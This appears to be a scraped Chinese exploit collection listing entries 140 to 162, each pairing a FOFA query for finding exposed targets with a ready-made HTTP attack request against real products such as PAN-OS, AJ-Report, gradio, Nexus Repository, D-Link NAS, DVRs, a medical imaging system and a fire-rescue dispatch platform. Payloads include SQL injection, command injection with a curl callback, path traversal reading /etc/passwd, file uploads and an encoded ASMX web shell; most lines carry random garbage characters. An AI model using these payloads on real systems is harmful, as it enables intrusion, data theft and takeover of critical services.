Upgrade-Insecure-Requests: 1% C2 _9 x8 l( a
4 Q; d4 a& U- d1 e2 E) {/ i: \
' ?. @/ D3 i. ?
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入; L. @* o6 g+ W/ \
CVE-2024-2566
' V" C M* [! P* v% S/ AFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"! i1 r- H/ W1 Y1 M2 ?1 O
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1' o9 |. {% n( o$ v, s) s" |
Host: x.x.x.x
& }9 ^! M1 M- j2 ` ^. }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: s% T4 u- h0 T# A% R. I. v$ _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ B7 |3 G2 l$ n$ |# l7 j3 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 z, g# x: {; R% X6 ?Accept-Encoding: gzip, deflate, br
5 t1 Y t% A iConnection: close
7 h9 c( H# ? W4 u6 vCookie: authcode=h8g9; p0 p2 l" I" s# h! w- c
Upgrade-Insecure-Requests: 1/ ]9 K" E4 t8 {0 @" q
. B4 s7 k: H% ^4 |# d
; E' r7 m H |2 o# _
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- @+ A1 d3 v& T& yFOFA:body="指挥调度管理平台"
9 X1 g @* ~3 v7 ~1 j: @8 h% O9 P9 mPOST /app/ext/ajax_users.php HTTP/1.1" g# M& l4 t: u& L2 e
Host: your-ip" H9 q7 Y7 i1 V7 s; k
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info+ I* z; r& l0 X2 A' |, s" H
Content-Type: application/x-www-form-urlencoded8 E% E- r3 G* Z8 t
' [; n' S& H7 ~. u1 j1 }2 z+ H( A' j. M$ H, t8 ^
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
" C1 f$ l) Y9 d6 D0 u
3 c [$ w* l) [" `
( |4 C- V+ y3 c8 G8 G142. CMSV6车辆监控平台系统中存在弱密码
" ^0 ^; }6 A {' PCVE-2024-29666& Q0 s& y- ?. y, Y/ f% U4 v
FOFA:body="/808gps/"! Q1 S6 z# G4 e
admin/admin
; C& t& f$ S6 _2 ?( `1 Q0 _143. Netis WF2780 v2.1.40144 远程命令执行% Y$ ~ ]9 y" S* H/ m
CVE-2024-25850* b( ^) W5 z* n5 n- e: C
FOFA:title='AP setup' && header='netis'
& d/ v# |' n- _: m3 S) R5 ` OPAYLOAD
4 c% J/ ~% H2 p1 J$ ^; H6 o+ f- m
1 m+ ?; o0 a- E& l2 m" ~1 \144. D-Link nas_sharing.cgi 命令注入% E/ S( L* y. [( ~4 u
FOFA:app="D_Link-DNS-ShareCenter"
1 R6 V) y% w# bsystem参数用于传要执行的命令6 [8 P, F6 \( v) C' w
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
" E4 x1 j: |# ]- u6 O) C& P9 AHost: x.x.x.x8 X7 ^/ @4 ^1 x7 x2 N
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
7 ?6 |3 e% n4 P x$ r! o! G( UConnection: close
1 T) `) R- _9 `, o" d1 v- {Accept: */*9 L0 D: x5 M1 V1 V+ O
Accept-Language: en
. L0 R! P. o6 U% q# ^1 a% H3 FAccept-Encoding: gzip
2 f) f( L6 N! G2 w8 O3 z, V4 [1 s
9 N9 Q4 X/ R0 @5 m" X4 u& H145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# f6 x. T% T+ s, z) H
CVE-2024-3400
/ t' B; B3 S( l7 cFOFA:icon_hash="-631559155"
: F6 v# [9 \) O. X! i) o# [- dGET /global-protect/login.esp HTTP/1.17 b1 P# B b# K, z) Q
Host: 192.168.30.112:1005
, J% i N8 M0 P% @2 D' Y/ g% VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84; s/ r* J5 c9 P x( |, S \ T
Connection: close* @/ M; f! p9 P
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
$ ^% Z- X5 `5 Q X" `Accept-Encoding: gzip5 s" R- R" B2 S! F8 H6 A: ?
5 q# @4 M# M0 g0 b1 O/ [: n& M) `$ h0 L0 v8 U1 a* U; m4 y7 D
146. MajorDoMo thumb.php 未授权远程代码执行
% Y1 N4 g( U# E/ ~8 s: _CNVD-2024-02175
* L0 X$ Z. c n% jFOFA:app="MajordomoSL"% d. F* @- V, T
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
" v3 a9 t& y4 G" \: U: k8 fHost: x.x.x.x
7 b- ]# X0 M3 C7 T! u, V% RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.842 t9 c7 h9 H! I$ Y
Accept-Charset: utf-80 B5 z5 s# Q7 p6 \) x
Accept-Encoding: gzip, deflate
* E4 p# x' Q2 v1 wConnection: close, C3 y* H4 I3 |' s
# o, I/ s F- E0 d. S+ V& D$ w) b" l' v9 ?/ ]
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历 z/ @4 s8 z" e, g/ d& G, P
CVE-2024-32399
, K T( D& j% L0 {" i) NFOFA:body="RaidenMAILD") l, q2 ~) h) Y z( G" \- Y2 Z
GET /webeditor/../../../windows/win.ini HTTP/1.1; o% _/ x/ E& R5 h4 Z
Host: 127.0.0.1:81
7 O# E. {- g2 U3 b0 yCache-Control: max-age=0% a1 V4 r' m! r% x4 y) K @6 ~
Connection: close
d7 P) y( m! ~
' Y: K- m7 w: ]# k+ B
2 h- E) @6 l z8 L$ @148. CrushFTP 认证绕过模板注入# F- r, x' z5 R& g+ Q8 e5 o
CVE-2024-4040
( T# J3 _+ H- TFOFA:body="CrushFTP"4 m, }3 m9 x; ~! C5 g
PAYLOAD4 f) j% [; E5 t) r5 o
: l2 y) p6 [5 ]% E149. AJ-Report开源数据大屏存在远程命令执行' {& W/ k5 d, g
FOFA:title="AJ-Report"/ }! m+ ^+ l# R' d* A
: n$ C7 X* H' q6 U' R6 ^
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
0 x; y/ l8 h- \. |+ ?* Y5 `Host: x.x.x.x& ~! o0 l( L% o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ @' B: ^# B* w7 A, x0 |7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' L3 j: v1 l1 X4 v. MAccept-Encoding: gzip, deflate, br
6 h l2 p: t! a1 b6 n' X. aAccept-Language: zh-CN,zh;q=0.91 |9 k; K! g1 w! k) z s8 J9 m
Content-Type: application/json;charset=UTF-8/ k7 H$ A! Y' [; l
Connection: close
# g- K$ b+ {( ~" _4 z4 \( f; ^; @# c2 Y( T( P
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}. X! Z- Q+ ~- m- x9 a3 c
( \: m, d0 b3 v* Y2 M: E# E6 F150. AJ-Report 1.4.0 认证绕过与远程代码执行
. e* k! T! D: {% c o5 K+ a* cFOFA:title="AJ-Report"
x( o' e; k" d' s" F( `1 c' N3 m2 TPOST /dataSetParam/verification;swagger-ui/ HTTP/1.13 J0 K" p4 V& c3 \) w
Host: x.x.x.x8 M- Y1 w: p! r4 @' K% B% F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 n& [1 V$ e' ?+ m. m, ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% _' S) r4 I! z1 C3 {" c% ^( z
Accept-Encoding: gzip, deflate, br
$ K/ @' t# t4 x s0 n) ^Accept-Language: zh-CN,zh;q=0.9
) v# o. d+ O X/ CContent-Type: application/json;charset=UTF-8
# t- r- x1 ]* w' IConnection: close% p, r; d* z3 Y" n( b: A- D& j
Content-Length: 339
! g4 w9 a* [; y' |; p0 W! m. F- j* R+ |) M; J3 F+ ~
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}: W$ k! U3 k3 E v
! K' W% Q' O! ~8 f$ Y! W
& R# {5 b6 G; }8 w151. AJ-Report 1.4.1 pageList sql注入0 |- T. i3 }/ d/ K
FOFA:title="AJ-Report"9 h; `# K9 d" S) T- Q/ Z
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
6 K( F3 r: L- T( A. X! ]Host: x.x.x.x
" _7 X7 d$ S+ w zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( {6 `* T4 L2 \' R7 A) S, u
Connection: close! D9 E7 _1 J& {( W) V9 {2 _- @
Accept-Encoding: gzip% n, B( M( S& T/ `# j6 l; ]- K o
' \8 N& A) B7 F. d6 ~4 g# y
- q8 Z* z) L5 S2 t. h& |2 w# |152. Progress Kemp LoadMaster 远程命令执行
2 p8 ^' [4 }4 w; C1 `& ^' E+ cCVE-2024-1212
$ S( ^& f& |( gLoadMaster <= 7.2.59.2 (GA)
0 H( [) Y ]; J8 Z' nLoadMaster<=7.2.54.8 (LTSF)* K1 d; W U* y* R
LoadMaster <= 7.2.48.10 (LTS)/ ^+ {$ K1 N- D; A; B o, ^$ Y
FOFA:body="LoadMaster"- |0 y/ M9 E* a% R9 Y/ r6 T
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
* |) c; _( `) P6 V6 gGET /access/set?param=enableapi&value=1 HTTP/1.1# c; Y% n) k7 `: C4 Z* c
Host: x.x.x.x; k* V" G3 _" n+ ?0 \. }) b8 u1 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
0 k+ ?5 H& y. vConnection: close
, L: Q8 F X; B7 uAccept: */*
\) t7 [ b1 YAccept-Language: en- m; A4 y- l: J. \5 Z5 `# ^( Q( Y, ~
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
' B4 H& g+ v: s! ^# _0 dAccept-Encoding: gzip
2 X% W' y: s1 d8 x( ?+ I8 T; i1 C: t" c
* T" k1 \! J" o) V; w4 M$ r7 u153. gradio任意文件读取( Q! \! E) i8 @
CVE-2024-1561FOFA:body="__gradio_mode__"% q3 z4 u4 i7 i
第一步,请求/config文件获取componets的id
6 j2 p+ C9 a4 ^. z0 Rhttp://x.x.x.x/config
) J% J/ W; {% G* v5 ]( I: T& E6 {3 l, q' F8 i
% N- f0 {% U* ?1 P+ n) l0 [
第二步,将/etc/passwd的内容写入到一个临时文件
. i0 `- H4 z& iPOST /component_server HTTP/1.1( D, a! I2 s4 F# E9 j" H$ f
Host: x.x.x.x& Q- f8 a- s" H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3: q9 ?& C- r- j2 q* n# B
Connection: close
* D5 h7 R Q8 fContent-Length: 115
# O, l1 b+ J: L: X+ d6 F- \Content-Type: application/json
; k$ B' H# y" F+ O! YAccept-Encoding: gzip6 L0 k2 ^, o: i0 h; y: g; v3 w
* F7 p! v6 W, L6 x{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}, x' V# g; G( e* \' m4 {
$ o$ j1 F" ], ]9 R$ k }0 e' E' }" C
" P5 O* ]% Z4 m; U) |( R第三步访问
! W, b# ~( `7 I( O. ^http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd* @1 P6 |. K3 A0 P7 a5 ~* ~
7 G& j9 E8 ~6 \! l; V
0 F0 ?! {3 W( s4 f154. 天维尔消防救援作战调度平台 SQL注入
# S; e# r! E0 p9 M1 Q R& n9 dCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
+ v$ Y$ l, N5 l" \% RPOST /twms-service-mfs/mfsNotice/page HTTP/1.13 t3 E' ~$ x2 ~% ` F6 `$ B3 K
Host: x.x.x.x
. f5 c9 }4 H1 Q/ AContent-Length: 106
5 j- l' Q" z4 C0 W9 H% DCache-Control: max-age=0
5 T- r% T& {3 m7 kUpgrade-Insecure-Requests: 1
+ C0 G& w$ M9 q* p* I9 I' ^Origin: http://x.x.x.x9 D' J) p1 F w- E/ I
Content-Type: application/json
) b4 d d' d3 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36! W' J2 i# L; P9 U. h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ d% r6 Y+ P0 K0 F. H& b$ HReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page9 j3 D3 p7 e: W2 k+ O* e
Accept-Encoding: gzip, deflate3 h3 c4 }4 A% C$ z* W$ v
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7! `" E; o; S4 }, F6 d4 o
Connection: close* L( n* S; m3 R
! B/ }- s9 D8 c3 V
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
( y; J9 L1 {1 ^' k/ H3 {3 U# i# L
, x% E% r! ]) t4 b
155. 六零导航页 file.php 任意文件上传& u! [6 Q8 \9 B" S& |1 h3 c7 k# \
CVE-2024-34982
3 p: Q T( r; _% @: sFOFA:title=="上网导航 - LyLme Spage"1 m p0 X: G* i! K. B( R4 l( k+ Z8 R
POST /include/file.php HTTP/1.1
5 h3 G1 F" G6 J3 e' s$ l* kHost: x.x.x.x& P) |4 g9 o* B4 k/ C3 Z1 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
2 j2 y6 b1 i2 I7 ?Connection: close- ?, K/ ^" { \8 E7 B3 h
Content-Length: 232+ H, X1 u+ Z) V8 c! O$ {8 q
Accept: application/json, text/javascript, */*; q=0.01
7 w P* m. [* J# RAccept-Encoding: gzip, deflate, br
3 o: f. W2 @' d6 p4 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- x; N! S2 [7 X3 ^Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
5 z8 l8 N! W; U/ N- n# g, B* }X-Requested-With: XMLHttpRequest# Z+ R& E9 D* Q# e
9 F: ]' c# P7 H2 U6 e
-----------------------------qttl7vemrsold314zg0f
5 N4 Y. k" [" _" }9 G3 VContent-Disposition: form-data; name="file"; filename="test.php"
. F' U# A8 ^7 |7 Y+ c2 d3 B& x: oContent-Type: image/png
) m! U1 W' j; z- q$ K. P( l# A& f/ r* [$ O _3 K. q2 H
<?php phpinfo();unlink(__FILE__);?>
$ h- e% K1 ^6 A7 Q9 c. B; `-----------------------------qttl7vemrsold314zg0f--
( w; [2 J1 V! P2 C& \! Y& K( s v' B/ D! l
9 m3 a. ?9 o" c: N$ e; _4 I
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
* J [& b& W N* Z9 }) O- _/ ?/ s4 ^) i
156. TBK DVR-4104/DVR-4216 操作系统命令注入1 V6 e3 y. V, w7 n
CVE-2024-3721
, y/ ^0 N3 q# z9 u1 G9 g+ j& oFOFA:"Location: /login.rsp"8 M1 m l' g+ w# O" @
·TBK DVR-41041 y9 B' |* H, V
·TBK DVR-4216$ a( K' m3 o1 W/ O- z- }
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
/ ~/ V7 V1 S7 e2 S# \
' i- e3 c* G3 P3 H. l4 u. \- Y- Z7 P t. o: p, P
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
. Q0 u& U; I. C& o8 XHost: x.x.x.x1 B/ ~2 u" w$ {) h
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: H" v0 J. p& [4 Y/ i
Connection: close
" g7 Z! S6 k) k* o# Z" z. qContent-Length: 0% u7 b% u2 o& X& t6 \9 P* A" }
Cookie: uid=17 y& s2 \( N H# E& j, i; @
Accept-Encoding: gzip
" f" F2 |( q; v% g& D; Q) g$ P, Z$ o8 y
$ w7 H# x1 f& r8 h' B
: t( y6 G- M2 `% @ t5 x157. 美特CRM upload.jsp 任意文件上传" y$ N, l: Y& j1 o. q+ C
CNVD-2023-06971
) b& ?! a- Y* @9 G9 S6 T$ @FOFA:body="/common/scripts/basic.js"
. V- a- S% m+ U9 _* Z( RPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
" f* E# k/ c2 V) t1 d7 ZHost: x.x.x.x
F- X# K1 u8 K" @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 h" q* Y" W+ p) C5 |# f0 L9 y
Content-Length: 709
. G q/ x! g+ v; P8 y- {9 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; S) N3 X. v1 T* P5 i$ H" ?Accept-Encoding: gzip, deflate& S. M: @1 k- L* w8 ^: D
Accept-Language: zh-CN,zh;q=0.9! y/ p' x$ E3 E, O# g, p
Cache-Control: max-age=0 G; {1 v% m4 J5 e2 S
Connection: close
& ~& c. o' `( M6 z+ Y$ A9 d$ mContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
4 @$ c' L: P# i: a; T! ~$ sUpgrade-Insecure-Requests: 1. {: a L( e; x6 o5 F
0 h3 D% `. O, O+ k8 r& Y; j% `6 I
------WebKitFormBoundary1imovELzPsfzp5dN
3 A' b2 q# ]9 F. jContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
* p( B' _+ N" [+ O$ k& u- QContent-Type: application/octet-stream
( ?2 U0 L6 K" m7 A! S" O) c6 Z+ F
& o! B" T5 t! anyhelxrutzwhrsvsrafb
3 w8 i4 \4 v! N6 v7 Q------WebKitFormBoundary1imovELzPsfzp5dN5 I3 J9 p: u% j' J; g7 l. |
Content-Disposition: form-data; name="key"
3 V7 p* V6 N6 m
5 k* P* `$ D1 ], B- O, S4 bnull$ W1 M+ `3 Y5 B* ]- m1 m
------WebKitFormBoundary1imovELzPsfzp5dN( x/ ?" I6 p: T7 I
Content-Disposition: form-data; name="form"
! X6 i9 F$ R5 ~6 ?2 _, \1 u3 y0 z5 \, \6 O: s: s3 X
null4 f( G% U4 D4 J) {0 [# g& |; A. w
------WebKitFormBoundary1imovELzPsfzp5dN
7 i/ d, }7 v) }6 Z4 Y& v6 m, rContent-Disposition: form-data; name="field"! Y" F I" e" A! v6 L( `
# n# E3 f) `" {5 W- r+ {: G1 h
null3 d1 X5 S7 _, ? P9 M3 R
------WebKitFormBoundary1imovELzPsfzp5dN( c. x$ _6 G3 E t% X5 W1 |
Content-Disposition: form-data; name="filetitile") c! ?0 K2 @# F
- C/ y" ]# w5 O7 \. B* \/ d" P' Jnull
4 ^$ m* O- o9 I------WebKitFormBoundary1imovELzPsfzp5dN0 d5 q) e: V) V
Content-Disposition: form-data; name="filefolder"" o/ I2 M9 h, W" q# K5 a3 S
9 s/ I% S4 B2 W9 E6 znull( ]/ m& t) x W- {1 e
------WebKitFormBoundary1imovELzPsfzp5dN--# U9 r- n8 l: B% r& K$ O
' k$ D) [* Y8 u
: T* \+ A, \/ i, Fhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp1 B, u# f8 n. y( k! j |( k& i
. ~! ~6 l6 v6 R3 L/ ?. R
158. Mura-CMS-processAsyncObject存在SQL注入8 ~: _1 S& }6 {3 I
CVE-2024-32640
' k( w% h8 h+ k$ o" `3 ^' oFOFA:"Generator: Masa CMS"
$ o8 P+ d: R8 q" Q* `8 |+ d' C7 U+ xPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
) }; o! V! ~1 m: z' uHost: {{Hostname}}
1 `6 O6 i- Z( }- s: Y! ]1 f, oContent-Type: application/x-www-form-urlencoded) v% }: D" Z) c, P T
$ e" T. i* t& Q" s) v4 Xobject=displayregion&contenthistid=x\'&previewid=1. @" @0 m% y0 g1 M H$ W, J0 o
8 q+ `7 n ]8 D% D2 x* z$ R8 B
Z) Z& f0 O* [159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
; Z$ p; P5 p( V2 p0 wFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"), c; g( \/ o2 x. T
POST /webservices/WebJobUpload.asmx HTTP/1.1
" X# H4 E$ d) X4 gHost: x.x.x.x6 g1 X8 g/ u- C% b" u5 t5 A7 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Y' b9 P" c; Z3 tContent-Length: 1080
" a3 u" h2 _; i- |! d! tAccept-Encoding: gzip, deflate. X" X! J+ q$ k' V
Connection: close
# B0 R# s: t% t$ BContent-Type: text/xml; charset=utf-8
G! N: b. z2 P$ |' H7 P0 w) dSoapaction: "http://rainier/jobUpload"
" [5 P6 i) }# N0 z* }' G
) e: @: A9 p+ s; b4 A, q5 }<?xml version="1.0" encoding="utf-8"?>
( a6 Y5 w; l* `1 `# g<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
4 U1 f8 `) I6 J3 [* z* Y<soap:Body>
1 h9 `1 ?/ m1 t: P8 v<jobUpload xmlns="http://rainier">
8 j# t3 N7 _( I6 v0 r<vcode>1</vcode>! @) F: }' G2 }- C ^& w
<subFolder></subFolder>
$ ~* X3 h: v+ f6 ~( b" |9 ]; b<fileName>abcrce.asmx</fileName>
/ a2 E6 c' i8 \1 m<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue># ~) ~" \0 E0 x1 n
</jobUpload>
2 O; \- c& r: @8 G</soap:Body>) s+ J0 B' A9 F% o
</soap:Envelope>4 a- p5 O1 q* z7 v
) y2 ?) @" E; z8 `
1 V5 ^( ]+ n5 {2 A1 o; I; y' p" b/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
* m! z" F0 Y" D" k. ~- B1 H8 K$ |% s& ^& D! U+ U% J
/ Y# G, `8 L/ b) [9 b160. Sonatype Nexus Repository 3目录遍历与文件读取
) F x0 {, j2 W& j; ]" [CVE-2024-4956
. ], U) s/ ]$ J4 e3 jFOFA:title="Nexus Repository Manager"
; a8 M5 A# G2 Q, B* B, R5 g1 gGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
( y' a2 e2 W ~# c; FHost: x.x.x.x
% H' P0 T* Z4 A' b* tUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0( `% \; S5 b1 |8 `# f
Connection: close0 m, v2 _7 F* a" h& N) @- A
Accept: */*
0 G' F* o; y: i' V x$ DAccept-Language: en
- ]6 M: q( d1 e' W+ HAccept-Encoding: gzip6 k5 a# i9 Q8 x7 u$ c
* }# C) _, h4 H1 K, [& \/ B3 a% L
0 j. i0 ~8 T$ e. b4 j) E! b161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传8 _2 S3 x: A5 S1 I; A2 N) A
FOFA:body="/KT_Css/qd_defaul.css"
$ }7 j, g( K$ B第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密% F; y8 o% V' Z" U0 u6 E
POST /Webservice.asmx HTTP/1.1
; ~7 u) A7 b7 `+ Q/ LHost: x.x.x.x
' e9 J/ b/ @5 d2 N* y& z3 p! VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36% m$ i/ j4 k8 Q& ]) J- g
Connection: close$ e" x& f ^- \% `, F
Content-Length: 445
- j1 U- W: v( ~& {$ C4 nContent-Type: text/xml
( S/ B6 p, [. v1 y+ K+ z0 WAccept-Encoding: gzip( } L4 h1 v8 K2 S
0 [3 t/ @5 i) S9 {( l m6 o- s<?xml version="1.0" encoding="utf-8"?>$ q' s+ ~- t E
<soap:Envelope xmlns:xsi="- _% B' A; E: ]# o! p5 u3 w p
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"9 ~, f& v- Q5 {' K- Q: n+ ^
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
. h6 { m6 p& S& c, k" v' r% z<soap:Body>% N T$ T$ G& O, P' [* _
<UploadResume xmlns="http://tempuri.org/"># C4 _: i% l! T
<ip>1</ip>- C1 M9 ` I( k0 @- Q# @" j
<fileName>../../../../dizxdell.aspx</fileName>7 |, e; C+ _6 M1 g. A* A
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
2 k0 M, M) b6 z" c9 a- L<tag>3</tag>
% I! I) g) ^) T$ a! Y8 v</UploadResume>0 X# `: O" n+ U4 d8 N) @* W& A4 B/ s) [
</soap:Body>- c- A1 l8 U) C: Q b) e& ]9 m0 d
</soap:Envelope>
, z. P) j9 A; }: v4 E' O$ F5 ~. v+ F/ J' Z8 {
5 B2 u. t" [( A* w: w& `5 x) W3 L
http://x.x.x.x/dizxdell.aspx
6 V# J9 @# n3 i, Y+ i; Q' c8 n( }- J% m) C @1 _+ c+ ?
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
7 ?0 a. e4 Z5 ]- |2 ]2 YFOFA: app="和丰山海-数字标牌"
+ J ?+ `: Z0 Z7 ]9 u- [% [( IPOST /QH.aspx HTTP/1.1* _$ w* e. E+ s# O7 J
Host: x.x.x.x( Q- H7 C7 f; v$ ?1 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.05 A1 G' @1 P. P& t7 W
Connection: close
